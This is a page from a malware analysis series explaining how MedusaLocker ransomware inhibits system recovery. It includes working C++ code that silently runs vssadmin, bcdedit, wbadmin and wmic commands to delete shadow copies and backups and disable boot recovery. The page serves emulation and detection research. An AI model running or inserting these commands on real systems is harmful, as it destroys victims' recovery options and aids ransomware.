MalwareAnalysisSeries

This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the repo contains extracted TTPs with code along with the detection rules

Project maintained by shaddy43 Hosted on GitHub Pages — Theme by mattgraham

MedusaLocker: Inhibit System Recovery

MedusaLocker Image

Ransomware often deletes shadow copies and backups to maximize the pressure on victims to pay the ransom. By removing these recovery options, attackers ensure that victims cannot restore their systems and files independently, thus making the encryption irreversible without the decryption key. This tactic increases the urgency and desperation of victims, compelling them to comply with the ransom demands to regain access to their critical data. This strategy effectively leverages the absence of recoverable backups to enhance the likelihood of payment, thereby making ransomware attacks more successful and profitable for cybercriminals.

MedusaLocker also executes a series of shadow copies and backup deletion commands to ensure the maximum impact on the infected systems.

Implementation

List of commands

const WCHAR* commands[] = {
    L"C:\\Windows\\System32\\vssadmin.exe Delete Shadows /All /Quiet",
    L"C:\\Windows\\System32\\bcdedit.exe /set {default} recoveryenabled No",
    L"C:\\Windows\\System32\\bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures",
    L"C:\\Windows\\System32\\wbadmin DELETE SYSTEMSTATEBACKUP",
    L"C:\\Windows\\System32\\wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest",
    L"C:\\Windows\\System32\\wbem\\wmic.exe SHADOWCOPY /nointeractive"
};

Command Execution

Each command is executed with the CreateProcessW and started as a separate process.

bSuccess = CreateProcessW(NULL, strPtr, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
if (!bSuccess) {
    std::cout << "Failed to execute command !!!" << std::endl;
    continue;
}

Execute all commands

All of the commands are then executed in a loop each started as a separate process to emulate the behavior of Inhibit System Recovery TTP of MedusaLocker Ransomware.

for (int i = 0; i < 6; i++) {
    std::wstring str = commands[i];
    LPWSTR strPtr = &str[0];
    //std::string details_str(str.begin(), str.end());

    bSuccess = CreateProcessW(NULL, strPtr, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
    if (!bSuccess) {
        std::cout << "Failed to execute command !!!" << std::endl;
        continue;
    }

    WaitForSingleObject(pi.hProcess, INFINITE);
    GetExitCodeProcess(pi.hProcess, &exitCode);
    if (exitCode == 0) {
        std::cout << "Command executed successfully: " << ConvertWCHARToString(commands[i]) << std::endl;
    }
    else {
        std::cout << "Command executed with exit code: " << exitCode << " - " << ConvertWCHARToString(commands[i]) << std::endl;
    }

    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
}

Find Complete Code Click Here: Shaddy43/MalwareAnalaysisSeries

Disclaimer

Intended for educational purposes only!